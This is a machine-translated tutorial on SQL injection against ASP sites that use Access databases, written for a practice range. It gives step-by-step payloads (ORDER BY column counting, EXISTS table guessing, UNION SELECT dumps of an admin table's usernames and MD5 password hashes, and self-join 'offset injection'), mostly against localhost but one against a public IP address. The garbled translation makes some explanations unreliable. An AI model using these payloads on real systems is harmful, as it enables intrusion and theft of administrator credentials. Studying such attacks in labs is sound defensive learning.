Access Inject ,Access Offset Injection

Access Database composition

 Table name 
	 Name 
		 data 

some access+asp Injection range

iis+asp+access

asp General collocation access
PHP General collocation mysql
aspx General collocation msSQL

The condition of injection is that parameters can be transferred 、 Interact with the database , Data interaction

get,post,cookie Can be injected

Injection process

1.1、 Enter a page where you can transfer parameters

http://127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513

1.2、 Determine the injection point

' perhaps and 1=1,and 1=2

1.3、 Judgment fields

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 22

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 23

22 Return to normal ,23 The number of error reporting description fields is 22

The table you look up here is actually product surface , find out 22 Column

1.4、 Name of judgment table

and exits (select * from admin), If there is a table named admin The echo is normal , If it does not exist , Echo error

1.5、 The joint query

union select

Because it is access database , Only the table name 、 Name 、 Content , You need to specify a table

?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

commonly admin It is the table for storing administrator information ,access The name of the watch depends on guessing

Try it out 3 and 15, That is to say, we can be in 3 and 15 Check the data in two places , That is, check the specified column data

http://117.24.12.33:10000/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

This password has passed md5 encryption

Tips for guessing column names

View background （ The login page ） Source code

This range has been modified

Access Offset Injection （ Do you know the table name , I can't guess the list ）

After the display bit bursts , Determine the number of fields in the table

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin  error 
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin  error 
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin  error 

And so on , until ...

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin  correct 

Illustrates the admin There are under the table 6 A field ;

use * representative admin Number of fields in the table , Calculation * Number of digits in place of characters .

Access Offset injection principle , The basic formula is ：

order by Subtract... From the number of fields * The number of fields of the number , However, reuse order by Subtract... From the number of fields 2 Times the answer just got ;

* = 6 Characters 
2 × * = 12 Characters 
22 - 12 = 10 Characters 

Burst name data
One level offset ：
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
If you find that , The source code of the web page is checked above, and there is no data , Please use the following method ：
Secondary offset statement ：
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
Be careful ： Here is 10 Subtract... From the table in the first field 6 A field , So the secondary offset here is select 1,2,3,4

perhaps
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)

At this point, you will be surprised to see the source code

Mozhe shooting range practice

The password goes through md5 encryption